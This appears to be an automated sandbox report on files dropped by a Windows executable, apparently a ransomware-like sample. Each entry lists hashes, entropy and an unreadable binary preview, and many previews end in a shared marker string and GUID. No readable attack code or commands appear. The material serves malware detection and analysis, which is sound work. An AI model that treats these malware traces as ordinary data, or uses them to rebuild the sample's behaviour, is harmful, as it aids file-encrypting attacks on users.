              Preview:ewogIl.~.x%..'..O...j.....l]..y[_...3.&...6._...s.@.;L......?..XW{.p.Eq].s.r...{.!.s..2..b...N.p.......N..G.......V.A".....5....Ifd......`Iv.....;Z.e=I<..z.{r.+.g\....|......0....(.8...:.._..............J..6.2.#...p0(..7U&.f|ib9W..^....OR7.5Kw....B.`..z...)..T....d,oK....]..K..0.?%.n.....4TMJ....jn.(.q...f5..%r.,.M;*J.O..WL...*..A(/..G9.$.4...-.zu.-/y....4E.p.........Vr_..u..X..h.<....X...&q.bf.....?.....~...%..4..>j".}&.i.^...e......Z..Yi.M.).......p........!1....N.g.u..\..Y.!...|j.t..h.K7..d1MC..;.'.ax..%..k.^O....-. ........E..7\.p..2.v....\5......^...E....-.95f...:|vCd.~.<Ng;.s_.gq'N.Xx5.^.......Z~.z.$D.O......m...........V..-mZJX..(....D$..SoQ.:iK...x.X.h..O..I7......='?..i...62G.*..l(|.2A......(..Y....o.ny..G2......PC.D...K..(......-..i....G)..v.6#.BWYWv>..C.^\.T..x.-.n.*x...Cst..Y.o....\..=F.\.Z...<.S.3..MA.P6.^..'/....|D4......K|1"3..;.vw..&...R.Iu..p]Z...+;.W..h....F.\.}g<............O.M&..../......k.(MNy..f...!3...zZNy.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):400
              Entropy (8bit):7.354418745226303
              Encrypted:false
              SSDEEP:12:8kucHqxvvvh3BvfIGW3WL/vSetzCydxa3cii9a:1uxvvhBvfIeDdtzCyd+bD
              MD5:EA9808528C1C4FB8F91AB8DF8A428A74
              SHA1:3B46469F5311C94CB4DBB88BF9C788203FF33234
              SHA-256:DB14F0AF367F34E2AAC174307D3C5BEC9CA0C91D65BFEE698EE6D0C770E3D974
              SHA-512:66FDCF91FFA15B83749E9CCE223A4A8D71CA25D9A6C118BECC3663FDAC3A3B2505D8F786C813EA0D59722A871CAE2121023F69039A8740B7D7357BAFFCE7FC6C
              Malicious:false
              Preview:1.558.s..c..z...uPu.R..He00.zQ..+bTqxs.1....s..o.5.D5.U.g?..... 9.SY6.....s?(&q!F...w..y........@R..n?yVZ.R.v.....K".Od.l...6....R.....Jl..'.c.\.h.W.....{b.mu.r.Q.......!..24..d....T..*8Q2E.d...u7.D.....5.....-<.l..CPy~.....>...;........27.M>T..!c..1. ..y..[.[.EvY....\..H....OL!...#."GH+V..&.t.x.7....J.|..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):387
              Entropy (8bit):7.354025027606359
              Encrypted:false
              SSDEEP:12:YRfN3hY8HzfTCwfmLhAmFi2VNidxa3cii9a:Y5TY8rTb46mFFvid+bD
              MD5:4D373ED4712C92E1CB5761BE4149A58C
              SHA1:81689B7A7D83A2FD2134D5DF08993385C11FE08D
              SHA-256:0D75F770C36AF51572AE18FEB64E6B60DCAE574C184A383DD118BF526A680985
              SHA-512:47D203241361817A370B3CDD8265118B8E38C3347ED5AD4494C400F0BBF2F76A7DBB353479BFBE0D472AD254CE64602400C6713019E7A632B3B3161E39CCA83D
              Malicious:false
              Preview:{"nam..X...b;7..:..Z9.....H...z...Y.{..S....Uh@j<i..X..Z.Q..8....n..[.x8^.8y.!.r.sL../...~(..iK...._y.24..V.v...2.R^.[y.t...:..NZ.......A..w.44l>k.-...4;.&O.Xk[....Q.Xx1G..m.!..H.:-..X[...u%.....aG.....}......z.m..8.....P..{}........o..edip'.... .u....,.P....<XW:.v...<...g......'.2.3.....!*..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):11901
              Entropy (8bit):7.985098103046704
              Encrypted:false
              SSDEEP:192:hHcF4Fo7qdKrxl1EhQyNNVHsRtzHyy7PDVYKL+XUOjOlMd/almkTP7OiqAYi8AX5:Q4a7qQryNGS2u/XUOjQMd3kT6iqAd5J
              MD5:C477A614BB80441531696CE99AF95E4D
              SHA1:D5219D72A32228E08215D8E61BBB49B9FD85B756
              SHA-256:64C83DCBD45117A47D288CBAD2930C948D0076CB85884A0969855ED02C5CF587
              SHA-512:736ED051DD7D8DBEC57CE266E187E6EF2F58B37089A9756B4A137C4B9614ABFC902381385E95D4564A11952F9036AC817FBCFBE87A2A8B1E69A52BB35A173C4A
              Malicious:false
              Preview:(()=>.....B......({...O$.7i.#..m..Q.R...I...H*+..`..a....R.O....n..:Y....!R.@.....Y.Z..@B.$..9.$.n.2'A......r..O....;..xK.b.x(.S.@y~l.oT.C.n..2&......;'*.....>rI...._.V...S.$.....J...a.Tj..1.08UP<..w7.?[....k..K..B..h...:.6.Z......U...R..c..........b...\8:..LwG....?.v/..5.....k....?.kP...._....(.]...[*..oj..D..........@f7 ..n..F......r....%..ee.M..)]......p.4i.p.e.f..[5h.,.....P....e...h..$."/8w..u.H........B...y..}..y...;.Pxy>...B..[...'l./....h ..;.....e3.gR5...k..dG.l..|..c.)E.oe\..+....?@....(..^.Op..y\..c..!._...?....K....L.0.(....#...Y.o.........{.d%-........nGLS....N.<eB....cZ...*1y....%^.T.....#..."...@..J.l..G.*....7.@n..Dp..,.....Vg...P..`......A.......U..<.Y.hr..p......;.I+..(7..Q...........O...._R....}<..`..........`\....<.......0.........l.Y.2...NZ..y.$.L2.P......8...7ht.8...Z.....6..5.....B.V..Mp...g.5o.\w...JE....J..........7(P:.q.K..e]......==7,-F.g....5.._.Z7N@...Y....W..c.q..#..?.s...(.......t.._d.8-r.).`lw..L.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):400
              Entropy (8bit):7.370539285067637
              Encrypted:false
              SSDEEP:12:gYGxM/PUOs+RPv4RMzLLT70dDHc25UZ3dxa3cii9a:gPOfN4RgL/7Qw2aZd+bD
              MD5:CD41BA06135EE60994147DF901BDFCBB
              SHA1:72C782E472B21ABE1F456B171507AED7D467DDF3
              SHA-256:380CF50CD5A2495B20F618E834BFC8C38601FFFAB7A495562A37E8401546BC61
              SHA-512:024A54757DB9185D0B6F4AF0ED154842D329B0A2ACB06C5C594B01B46C62730F3083D9C286CB70E5BB0A09C5B816830CFA82348352A74B0F2C7DC5EE9A78726E
              Malicious:false
              Preview:1.1B2..Y...(.).....t~5+"..u...f%h[.;2Q.e.O.=..b. 3.RH..N.^]$.}.Eb$.tS..By..v..@b..z...F..!.,..<=.....j'.. .i....g..bod.g.......+pK4]...U..[....5...'*".[...L%.!+6..mI..dk.J...z....kS........o..'.@..KyX....f.~7...i...Wuk...v..A.t...g.z..h..u.t...7|..&....CY...*.-{9MQ...9......Sr...X;..".w....h).C..u......"U...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):450
              Entropy (8bit):7.404631660824657
              Encrypted:false
              SSDEEP:12:M/QIScRGN6b/ddFhiUnj+S7Sh0lSdbp++dxa3cii9a:MFGG/dHhD+S7Sh4Wb/d+bD
              MD5:A5D0A2487FEB535660E2D9548E61FDDE
              SHA1:E4275A9047E4824A8FD7344706AD2B6D97A56AF6
              SHA-256:442890CC41022B3818DA1DAEECF0B4A18240DBABE03AA43C7F7528A85A23A819
              SHA-512:E0A7C4F6EABE8CBF4A878767F4F582027A87A9C80E21083F09044F9408029428C32BDC1FBD18BEFE5C7D5DBAC4612B604924D3F7A2E169BCB257778F9F31500E
              Malicious:false
              Preview:.{...<....?..C....Qv...(.A.Y.7%O.\4%..\....I.0...[...Z.............Z..I]....(.T%....h/}?....;./m.M.R...s.R6.6..A.-..n,._EPl..phy;....?..G...%.R....TaE..s./0FA^....Be..Xw$ U|...}u{.q.83}rn.*.9..}.j...Ea..E.../....a.R.r.C#.....*...r.j.....<.2.2.....5%......U..N.Di.30.I..b..PG..d.Y.....9...e-w.._V....VS.U.8..G........vybv...K.c.....-..L8.E.]....>.R......gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):953246
              Entropy (8bit):6.396205075145653
              Encrypted:false
              SSDEEP:24576:e9tc8Swf1p6KQcXZPLU/8d1rugFDcbmcVuVV2aiptWVslXdsXv8:e9tc8SY1p6KQcXZPLU/8d1rugFDcbmc3
              MD5:433932BB5EC432891A731F4BF1751972
              SHA1:814905E927C78733C74EFF77F1791141341FF339
              SHA-256:A08A433195617D6A653019E0BE93DF477BAD885D341FBCCA74BD88062C977173
              SHA-512:4B249F8AF34AD80852FA39AB417D5197B14E43AD9AAB71DEE10B3783CCE68D8262048A1DD4D7537633B26CFD610F6BF621EBE136F8560324810FD50DD3D85495
              Malicious:false
              Preview:/*! F....,....'..1..f...].,.b.Vs..IfW.5...*.:nw......P.;.....m...pn....j*e..y.v=^..-..O.a*)..5j.[&.Ef....S]a...`.....U.......c.v.......F...>$.T..#...vL.9.].......P ..Y.....Zz...E....BZ..=)...)..0.i.+....w......f.=...O.?.a.X......N...x.~.t.[3W....{.../....gs.@Q....z...3.?.;..;|_;..cC........\zqkXZ..a....G ..........L.3...9...=...U...:..LqN.d{..'..S.(.................>.......o.(...p..kj.!_.!...D..d.}X\tE.|my|..v......P...95}..C...s.|..l..j...`..{.........<......6.4 ..h.B.5.\....6...F..*M9..+^...xtnKc..?.s..7.Z|8I...jY7.|.*E..ED.Nr...E.n6..f..........j.2l.-..._$.P.G.N.....s+11,.$.#.v..`>...)...G.on._....<...i..).m.......X.N.....TB..Q3....n.......|.c.......{.?.Uro.;X....LH.tj.....K{..@C]%...|.......W....y..`6..Pie..$H....<.KCJMi.S.w..`.N.bX....=..u<(?.5q0.`..W......qmX..E-..g..3F.........<T.%.a.m.2.b.@.V..?.<B._.l...GL.`7.y...k...e.....L. ......rxs..'...8....h3P.\=..H./.Si.@............8A...S...f.Yi...5.....U..r0...G(.A.@F...W..6../....0..b.;
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):793243
              Entropy (8bit):6.543802149932368
              Encrypted:false
              SSDEEP:24576:XpCbZ9Kqs7qS3I9yHp/1l0I/Eqr3HNHK7ToEZyJxenyMUSM5VU+O91EMFgBb:ysqs7z3I9yHp/1l0I/Eqr3HNHmToEZyN
              MD5:F616E1DD45943A2EE232140D1DE4384F
              SHA1:FD9DC984165D73137DAA817E6702DAB1A000F6FE
              SHA-256:2983DED5CC8A5AA2D4044DC9EAD319E1A14796ABA2267F53B42F0C4C63DDD6C1
              SHA-512:2FB2B1E7D051E1AD537EA8E826090FE93584F671EE741771DA61EBAE202465FA0A8DA3BCD5AE81B1162D7E740E8A180A24F43524E0C447BDF8FC9124D358E708
              Malicious:false
              Preview:(()=>.....8.....n.>....R......t....8.j_..8..X..Y~L.4.h...U.w.H.......t.U.J.oZ.N.S..cj..II^.....z.$..,. ...........A...Lz.:o.....vg...d.VPB.DB.S.".L.4YB.jR...=...B.......q.q.....l....8.j.!h.Uz#C..6.ra.!...,..........a.6n..-.h..[.:a.w..'..=..j.....#@..d....X]..Xsw...$..-.qi|.s.K..l..i......[g...Q.vG..,V.:&.`..6.."..CSk.,.3,&..fg...A...K.....p|0a............uf.e....z....U.2.V.N.3.)....C..6..A..t.........%....1.)..j5R........H...{q...KF.O*.........k.a..............|....#`..L._;.w..$X|K...<.G.....)+..._..v......Z...7hO7.c.O..9..t.>..tL.....>.......e...E.-j'...ao.......0~.c.C......../n.Rp..d..W-..?|m.o.....4...^.YK...O.../.j.2.O..tAR.;6.8....t....$W...Rxy`:......+.u..v:!..J..........4T..W.....]p..YtHv..8..D.j.|.."..X....F..d.?+OBUi...+K..s.`./Z..y.p...-h;".$.'.Y{.i.T..|l.x\.f..Q...M?.{.m.W..h.@.....uE.s{.?*..RU...:p.U.lD..).....p....Z.......:..B.5..m_.M....Ee?..#._..Yx..B..q.].....`...q...A..'.:"..4...Y.FE.C++..sh.~.j..%x...)..Lg.J.A~.....3..)...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):818059
              Entropy (8bit):6.5157724227709926
              Encrypted:false
              SSDEEP:24576:17ouWl+cP59G6zeDug5LGhcQKyrqJY/huIXv0er0Usyi1JbCk1K2qGzXgQzz9pxo:LcP59nzeDug5LGhcQKyrqJY/huIXv0el
              MD5:212E116BADB51CBDFE29EB001B3E6F66
              SHA1:7E07AA31BEE570CD36382991EC2F74E0532F261A
              SHA-256:CFDD8E03B2406D49A43A9DFC281A9CA89C7D5ECA9D0A33A9498904042804CE41
              SHA-512:C3872109BB71347891D309339C06FE50B8AFFE8594FC106D06D607EE9859C7DA578BAC99E393C6A92AE63C6179AA77068AF88AEF34B91FBE7B754E19E75B5D79
              Malicious:false
              Preview:(()=>....v..9..P....}n=.A....o'$5...y..q.O&)k...|[B.....]..*./.Z....h..(.."G..0..F...*..%..N&R.....00Y.P.h.Em-I....5......~J.F)...]tR]U.%R..N+A+O...............@...{%..._...q.....%...V....s...Ru.,.4.F....[...8.VR.....>.....0M.w.0...4...`.t?...vK4 =?.../..4..C.z!-.s=t..2....Ek.S8..h.;SRJ.R..)..Z...1.D...U.I....$noa..E.lz..n.p.W...........HK.I.......9M)<j.ZP.s......YY..r......A......6.o..=.Ca....{Q37..$.B.|.. 3.#..K......._{6c..rnel.T.V.$..I.vk.S6~.(B....Dd.E...v1..".....U..!.."-y<l.N......Ba.0.c.:.>...U.E..g..f..{.G5..@.....va}...+:..LE.....-y0....+...d....-k&..\.p}me}.(..:._V....Cs.<...$.{.:.Q.C.*.w82.<....i...{.V@.r]..`.....5."......{.x/...=.m....'..W.... ......:}.>.P... ...I.....6y....CA......d..).[...|Sk~:.l_u.....3.C..U.u.0)i.......H.w.....B=....,...*.?.sJ...3!;.j.s.kxH...<.S...$...}...&.'.hh....4....V/1.O|.B<.3..Ch[........X.;...M.{V[...O...........v..T...*&/...\:...gic,....7L._3..!.|Z.E...)Ar.9H.X....V.Gy.}...../...i..q"..\>.n
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1316574
              Entropy (8bit):6.2514269411581145
              Encrypted:false
              SSDEEP:24576:xYr6XunR3dM3XW2/c66UwVToLNoX62rgGOs4zUg2oGiNvB+n8aW8Wmf8jTw3AN66:ErR3dM3XW2/c66UwVToLNoX62rgGOs47
              MD5:768DE4D3AFD3EB6C9AEE71F639AC02A1
              SHA1:83A6C4712EF53A39C4143B62767F2A4905182275
              SHA-256:5FCEC84B00295EA7290954606059F423919F9D21FFCC571CEBFEE70D6D97450B
              SHA-512:2B7BF1054F4E4CD2D1FAE368F159DB7BC71D9A648A87AEF9D8E029E85A34301CFC0800A7837194087C712CFD08998306699C937E403CAD9BECD476D3D35523DD
              Malicious:false
              Preview:(()=>s.0[Tp.yN..{H..........Y..\...u..m..<L-..i.......b..Y..........5n..;....... <....U.........H.5b..d.D@.=..Z.`r...*k.......\Z../&S..Y...WN....<..P,.Q..P8..%#...5.%T..~..([...80s9..H~^Q.....uix..<l.~......c........"j..aYT.@.`H.6y...g...@....!"W.O1:wu.`.A..5..>f.@j.g..mt...s.W........~.Y...7....2t... ..&.M."..c,1......r1}.......Cox>.W................n...p...n..G.......7K.#'R..k..<..//f.sCC.G...L.a...?T@.......*.....T..l....=a.*M...Qk.....Y.Mq)E.?.J'T.u.......R.4..Zv=...,...+.9../.6.........8c.b.,lz/.P..$A';.......S..\[...`..C..m|._...W>j!.c.........U.p.[95....i%>;#.j.uF......-.>}U.5.=.3,...&....~..W.&.'.N.&L.6..>....wgS. ......l]..r..9_$y.h#.......Jq..iE..n...h:[...U../...f.....j..iwLy...*:.V.S.N..?........Z..~e.._..it.l;*'.H.T...$.C..w...e..Y6..;..p....r...g....].M...e..y..6.L.......H.&C....(.Q.k7.pF...D8.h.H..~....5b.7.D..Om..!....2..l.l.h...9.p.~.F...y\...n...ug.h[...TV.\_:....Z..f.v;M.P.L....}93......6/...'.R....5.F....We.x..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):52139
              Entropy (8bit):7.99640851380227
              Encrypted:true
              SSDEEP:1536:UgBxH03KGqQNL2NFw8sVaTgwWdYjOozGd:UgBxH0bqQ92Lw8sPdvo6d
              MD5:6A7CB1D05FFFDEF00DFC3B676A7C8AC5
              SHA1:9F881A04D359DB0A30D158D395A69877A78BEC2A
              SHA-256:48BED96F2EAE783C4946E5EDBEAE76405BD76B21EAE8D31093A51226EB19D875
              SHA-512:4DC282A5D1401D46F5A64019D38CC000BD5CDCE066D5BD6D7920B8464CDAB8E6C4A755E9F523768846D43E1A0E1BDA365C84A5184012BED8152E24C8CD6E75FB
              Malicious:true
              Preview:(()=>i].}.I@......mG..=.....f..`#Y,.U..y\....5 e....^};.-p>f...#!.c.Y...[...d0..Q..7......T.~<..|M=..:..pVB[."..1K..P..0.m.....R A.?.@Hi.J...$kE[.n..g.`1.I..V[cT......].>'........j.i.wR..A.$A3.....Vu..|.K...$A.Q.`...w.(..r.Rw.[:%.....s|.n(.G.......?.....-..jZ......c......9i......m-.kx.C..."...F...\...>.v.'C+..".W*JE?:....\....x>1..Z3U.%J.S.....J.....S.[..X..].mj.^...Y./k.....S..!..?I........'....7.dc?.-........<......!.*w'...*...9+Q[@/.....`Y|....d...s}J.z..e.... ..k.....f.'7..%.EGU~g# ......O......_.|..dy.YMC...7..'.vAp..J..~....vQ.8.>.:9q.<...#....K`.Z.a..[O.^.m.q(..Zj.4'.......n+..{.....D~..)`~gSw..!/.......qJ...>.\..c.Km.s..lK.-.5I9$Z..6.;;..z.q..w....N.E/.r&C[$d...<3.....6....a?0.I....8"..,..}..w-..@S.V7....y....[%R.\....N{+....B{.........`.Y2..{.yo..s[n...G?...4'e\..{ix..w=.....b*5...o.......<...i.A.wT;_....6..''r.7nE&*?.h.=.....ep.3/..y..c. . ...mD.....l...Y....z.Q.M.k...k.;:..n....d.(.......g...I.R......<:....9..-..>o.Z......
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):400
              Entropy (8bit):7.4022344153447595
              Encrypted:false
              SSDEEP:12:ci234H+Kj/I2BDtHVoNENz11Dq3dxa3cii9a:ckec/bBDt1oN2e3d+bD
              MD5:25B45A7636B6B7DBA3E99DA99E1C0F70
              SHA1:D49EC9149AD0BD226B46CD50E4A2278B956BE8FD
              SHA-256:ED0580357F41D869E8EC89D9822730EE43EEDDFEF9E00B1E27209C0E005F5D49
              SHA-512:DBA938DAAB42660361B8E4E9F3234DF4177DAC10BD6683859234967F26A84B5D69D61504D193BED97510983A665313D7BF17589E16992281723AF85CEFDE6B7E
              Malicious:false
              Preview:1.5EC..+k..d..o../..Ih'..%.#...]..SN...`.y>.l.......T...0h..E...E.%.)CE..+....=...$.b.i......,.A..Z..>...C~..J....Tb.....2[S&..7...G?>VF]~..Y'...D.]x...ulE..p....Mn....;V.b(.%+&`....8..$ouA...q.D...,]4..2.J.......y!0+..@.......N.......~..W...!(].f.......kE...|/.VvI...........l..O).mf.u......k..).gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):481
              Entropy (8bit):7.471100428496817
              Encrypted:false
              SSDEEP:12:MYGONPoVpZyNpzcUCKXXE84tF4P55Igr/TPUc3dxa3cii9a:MfAspuTCeQgcCd+bD
              MD5:3B8B9B15942844D062D0287DEDCA4D79
              SHA1:4ACD5A105C528251CF79DD4551E1766357FDA550
              SHA-256:35FF768696D69940EF9B777BD44EEBCFCFE13EF9CA682A09B9D3DA4ABA15C951
              SHA-512:273FA9229A892AF19EA341A22E2C8F2D1567D9973431CFB16BCB95B4341DD48CE53755ADE0A5EE85FD25E780FBCBE7D28B992F14504DD93CFF379F12AA85C0B6
              Malicious:false
              Preview:.{..oY.. .BH....~._.A..xT.M,#.6...H.U...,`..8X..t.]x. ..7.....iD+._..%.....%E*...R..o...w.xo*.t^|q..j.'.(GE8.G.@...;%.~.p.p;pt..L...H.[V.<5.LCB:..j.......=k.j..../5..{us..5+....>0v..K.3,A...dp...w.....82:^....C...k"w."M...!GG.Z.B.F~A.!i.~Y]..N....~.v*...vP.........Y...T.U....>I..b.....i.$.ZZ...1.d.`.....>.;A.1E.I.L.rO=k.&G..c..y./..L.0.8.*...{N......L"rk..j.l.c..7...W.S....C_..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):777261
              Entropy (8bit):6.553092619940288
              Encrypted:false
              SSDEEP:12288:LKDq6rD8gQQOT4AAqF8TcX41ahYSWW26ejCSny5IHve2ReLUpmosaaqinFrP/pQL:uDZOTbAqF8AXS5JW26ejCn5IHv/RzpmI
              MD5:64685DD61C3D92CB55ACEFFDBB357E50
              SHA1:F24C7622E2036CECAB46C8D912788CA2048F9D5F
              SHA-256:066AB695D3736A7BB3A83486EBA3BD6A557E508B5FB92B3D24346A22ACFC34A5
              SHA-512:E3DD5218DBCAE2F2FF5B0803AD8D85D02919E89F75BEC1C01E9FD8C5BBC0AA64BBB28D774590CEF5A929348FD8E9CBB039C12B3A630FE21E08FC04554978E6BC
              Malicious:false
              Preview:(()=>(Lk.i..:.u.JB.20,.^G..Vi<.1..o.Z.Nk....^.....Y......n.U..N..0..q.(3..T.w.k*.I.....4..i..6......O@........>S.(.M.i..B.}$.l..V.j..........xn...W.E.,....@.#tx.>1f..*d..F:P.H..u....^:Q.3........!..F../.b..K.A.....Z6>..2J...4.. ,U...Y....c&...b!.X....,m.'.6...4......P..f.~.&...6.,.. ..O.k...cl:.;..........>h.u......+?...C...K..'}.H.......'4_../....!...T/.....h...qc=..[s.0..g..-.I.)..D.]ey>0s........o.......O....DA...v.p.*C..bE..{...{.....cI...(.~)e..'.........`.n....R..=...-...lCp....kZ...w?[.x......O.j..i..b.K$T...m1J....?.Qz$'K..6f.8n%..L6r<.!......B.j..D.L.W..mE.|..9...f..K.....Y=f.Y....!H...ax:.$nK.(..;.].,....T.`......$..AD04E.P8....Q...{.......>.u.<.o!....d..........$.k4w...R..e..ya..J`.............8..T..g)...?.^.V..x.N.....z....1............:.x.X......"2z..'.0....9.........4U.........yk!a%..g....&$#...:M..........Q.=u.D.."..K...{m.'/3..NX..L.T.f.(.........1..:.<68.{..v..?..)... w21K.o....K..vD...;.......^.E....y.E.F.....E.s.)a.X.h....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1679
              Entropy (8bit):7.881249149405637
              Encrypted:false
              SSDEEP:48:VwFwILJ0bgexaJBZ9QcTWy7dRSIx6/U981q8D:OFqgLb9QcTWkdRE1r
              MD5:280E3E0752191D2696FE59B208A1E3CD
              SHA1:615D3F42A15947A5FD2EA93EF4B341161B6CCCA3
              SHA-256:371D56E49A9F1FD0D711211F5E9A3A71800B7450EF42163CA16958C90D9D9B26
              SHA-512:6FFFC18ABD502E8C47C4316195C059CF78AA553398F23446713D330396B909C577780BC89D643C79D48613ECC7B0156527FEE726698FA1F854520AECE7E25BD0
              Malicious:false
              Preview:<html....).E..-...&z...@......E...*OL....Yt.TR.sh.,....:...K.+..3{...O....KK..l.....lTtX5....W..*.6.].H..4.2......>..]..r.z...|5......X...x.W....e.?...5.....#...0..bJ7.F:.N..9s9(...._S.}.?....)|p?.vU.j..-U.s$.......{...ORo....u.x....1.....1cf....S.a&@>..Q.t.7..eo..-.]EZa.0.X.]3_pP..{F.$..g.U=......S.}.+.|...".....H.&.^s..T.Dx..Ej:....F..I.k.(1^]N0.O..@5...@...].d...:...SL..._.............3...N"m.x.. ..D..TX..cQ....b>......m..gu...Xb.9...h...Lz-.g..........h.F...... .Q..g..x...F...@..CD..z..hI....'n./.Q@...gP...n..P.........2.R+...B.i..EN,..r?-y..V|6...(.1....J2l..P}.&3.<_.6...V......."H.`..x(..3....~..m1O.VDU..w......fk....f..G.<X..k...._y^.......yc&..s.(.G7...&..5D.....)...T...Ngt.....$h6...,O.Vk..s.)..,.:......t0.J.........K.(..J.&..(....f..,M..s.'.#?...".l..........qZ...C.q.N.<_ ..o.....pV.\#.<..!...7....;.....x._O).ka.%..cD.pE`&.<Z..!.o.i..[.o.T.A. J..qx.7|.v...7_.q..w..)b....T...F.E..`. ..$kR.<......y[k.S..1D.pj...Wq.o.Z.....=
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4988956
              Entropy (8bit):5.713674779339573
              Encrypted:false
              SSDEEP:49152:0pYWE3HiCbgr0I8ruVWgtJylhTd2fsZjVZLl7gJOoAgGJ3DA5dOrPyCuiJ4zPLHg:0pY3ePa48
              MD5:53774B7E8B64388015F8B3CF8C952E6A
              SHA1:D7EA6D798A2767314306C88BE70FD5EEC8264573
              SHA-256:44622599291B12699BFF62E65C35DDA2A3CE1F262F1F96A820A12CF8E48AF3AC
              SHA-512:5ACCBBEF76499BBE49035E33E5A3CDE549B112B8BC014EB68BBFA181248E8A7DC35547935EB9A615F0BD218AC81E79501C1992FB7D31696EA37BEA302618F899
              Malicious:false
              Preview:/*! F.|..u..0.-j..........M..............?...b.....$|]6.M.1.B.ol..3l....[.Y..5......eY.\.N.C}.l... .....u@.&..j.>....p..l_z...Do.^M......X.v......xnX......)j...c!...a..J'y.UIq.%.........'.4........jyQ......,...CT.R..BwH.b.2.....0.CQp7w!...^[...2....T1....QQv:y....4..3f2B.N..N.%.[...nQu-.{..'x...eW|4K....jx.......X.._. .`....`_......P..YzmG....[g(.(...5...1.....cY.N!.P..Rr:.s| 5...............G.]Vso.....l.rZ.......)..6.>....\Uc/&....F!.Xs...y$..?...P..o.Q!..^.Q....{.b.....*..GFc...3=.%/'..=\.xW..FU&..A.;~F...B....=.t...J.....^...8...^N|..&P../.....{.h.y....'=....)..b..................3..K.h...E&.T..'......`V:+...*..>.KhF.r.....Ye..3....;J.la....A.z.{.`.2..8.......9.v..qb.U........>..........A...}..p0..N&.)$T...d>.'.p...G..b.f..~:W..I..~........JP+...@....d..XH#.....J^....s.2."..."k.p...%RN.*X.^k....\..:.zxs4.S..a .A...FD#..v...Z..-...:.....]..O...26..>C.bv..L..`i^....2z...a.&Z..T.._L*...<.F]....~....l(......B...Qr...Q.2....JG.zBT.b..\w.y.'
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1473
              Entropy (8bit):7.860567116926808
              Encrypted:false
              SSDEEP:24:m3VrPWdQibkxf0lLLr2gHWaRoi+1WCwwVwbMD+At6ZNctd+bD:4FPW2ib1LLrlZ+MIw1A8I8D
              MD5:96668A504AD7ECFBC723BD6E6A5F4EE6
              SHA1:A4D5E78903D6595E797CDC422CC666E98448AF4C
              SHA-256:52964D80F5C954405A7105D5C912836DA2B0DA4399F2386AA9E32D29A22D7617
              SHA-512:3B9CD9BD7168A14A78E0E73947530955B6F7DDAE069E51D776D4474E8A6C82914A8972BC9BB5386ED2913E36CF7B72820BDF8E14C9E748FC9BC6DDC2768FE736
              Malicious:false
              Preview:<htmlL.....5...8.{...D.P..E.....C..;......od..,$+.......}.;.....C.r!...5....5...TN`._.P.`.G\]...a.. ..l.[..I..S<......9"m...9'..r`.n..aj..c.^..=....,,VS.%.of.. ..F..2...........#._.1.4S....$...o@.B...G......X..o.)/..rr.zH...[mY...`.M.........mHwl.....T=..]./..R.k.0.V.......<....../'.d.kU.......l./[.F.s.0.v[.......,....."j..Pz..\.}...&f.H(j.s6F.28.~.../..,.,....[;..Z...|{J.......^....hd.(..c...d....s.>..51.?.....[O4....L;\Q)L..r..mU...V.b_.D.].~.....a..{.$...H.a..q.o.o..."...%33._..ED.v_.....3@..(`..%..,....-.!.fa\...a..Z.&lM-.....b...../..1....mV-....".....-b...D.k..y...K.>....&.:...j..|6u'o.J......Q....c..R.e.iD.$.|.].......9.......yN.].y....;zF`.H,....\......1.....k...a.._.t..($*B...m...b....F......uI...xV.^..i...TX<.2.j~....K4...U@.......v..c.^}kr.^.......Pr.AO......q+q}[..{.....#...y....%......s.|.U~....Te...U..>.~Q..%..`/d......@VJ@z....?u..vc7%..I..W.\.x.T%I..;B.k..k*It.Ug...T..k...?.j...i..Rj....Me.M:..T........5..^...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):12270
              Entropy (8bit):7.986629879557936
              Encrypted:false
              SSDEEP:192:3T81E1lYY6wjnvKNr9crcJWPYSi99R+9AgNfQsfoQCNCLLgbpvpV1fgaY8hmmNkr:3o1YpnvC9cr+WPvi99ywQCNCLLURV1fE
              MD5:B114F4345A4F9901F317A327CB396AE2
              SHA1:C1B2C0B6A18EBDF0D288BC562ACDC95BFEF0053A
              SHA-256:93D98C6E727AD284A517AE92D486657D3F769764D78C2D9ABA645EEF90871540
